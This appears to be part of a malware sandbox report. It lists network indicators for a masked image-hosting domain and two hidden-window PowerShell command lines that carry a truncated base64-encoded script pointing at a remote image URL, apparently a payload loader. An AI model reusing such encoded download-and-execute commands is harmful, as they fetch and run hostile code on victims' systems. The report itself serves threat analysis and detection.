Technical Information
- 'up#####eimagens.com.br':443
- 'up#####eimagens.com.br':443
- DNS ASK up#####eimagens.com.br
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'KAAoACcAaABOAEIAaQBtAGEAZwBlAFUAcgBsACAAPQAgAE4ARABIAGgAdAB0AHAAcwA6AC8ALwB1AHAAbABvAGEAZABkAGUAaQBtAGEAZwBlAG4AcwAuAGMAbwBtAC4AYgByAC8AaQBtAGEAZwBlAHMAJwArACcALwAwADAANAAv...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'KAAoACcAaABOAEIAaQBtAGEAZwBlAFUAcgBsACAAPQAgAE4ARABIAGgAdAB0AHAAcwA6AC8ALwB1AHAAbABvAGEAZABkAGUAaQBtAGEAZwBlAG4AcwAuAGMAbwBtAC4AYgByAC8AaQBtAGEAZwBlAHMAJwArACcALwAwADAANAAv...